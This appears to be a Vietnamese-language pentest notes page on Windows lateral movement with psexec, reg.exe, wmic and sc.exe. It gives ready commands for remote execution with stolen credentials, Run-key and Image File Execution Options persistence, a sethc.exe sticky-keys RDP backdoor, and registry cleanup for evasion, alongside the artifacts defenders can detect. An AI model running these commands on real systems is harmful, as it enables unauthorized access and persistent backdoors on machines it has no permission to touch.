Windows component

psexec.exe

Port

135, 445, 4915x/TCP

Credentials

Cleartext

Share

Cần writable share

Sử dụng cơ bản

PsExec.exe -u doamin\user -p password \\IP -i cmd

Kết quả

Ở máy victim ta sẽ thấy file PSEXESVC được tạo ở ADMIN$ share (lí do vì sao cần writeable share)

Ta sẽ thấy exe này được thực thi qua service để handle remote cmd

Khi exit session thì file PSEXESVC.exe và service PSEXESVC bị xóa

reg.exe

Port

445

Credentials

Cleartext

Share

Không cần

Đầu tiên ta cần chạy runas với creden của victim

runas /user:domain\user cmd

Câu lệnh sẽ spawn cmd mới, ta sẽ remote set reg với cmd mới này

Remote set startup program

reg.exe add \\IP\HKLM\software\microsoft\windows\currentversion\run /v testprog /t REG_SZ /d "calc"

Remote set program launch handler

reg.exe add "\\IP\HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\chrome.exe" /v Debugger /t reg_sz /d "calc"

Backdoor in RDP

reg.exe add "\\IP\HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t reg_sz /d "calc"

Evasion

reg.exe delete \\IP\HKLM\... /v <key_nhame> /f

wmic.exe

Port

135, 4915x/TCP

Credentials

Cleartext

Share

Không cần

Sử dụng cơ bản

wmic.exe /user:domain\user /password:password /node:IP process call create 'calc'

Tại log Sysmon ta sẽ thấy calc.exe được spawn bởi WmiPrvSE.exe

sc.exe

Port

135, 4915x/TCP

Credentials

Cleartext

Share

Không cần

Sử dụng cơ bản

sc.exe \\IP create serviceName binPath= "cmd /c calc" start= auto
sc.exe \\IP start serviceName

Tạo service từ xa và kích hoạt để thực thi cmd. Tại victim ta sẽ thấy logs tạo service

Last updated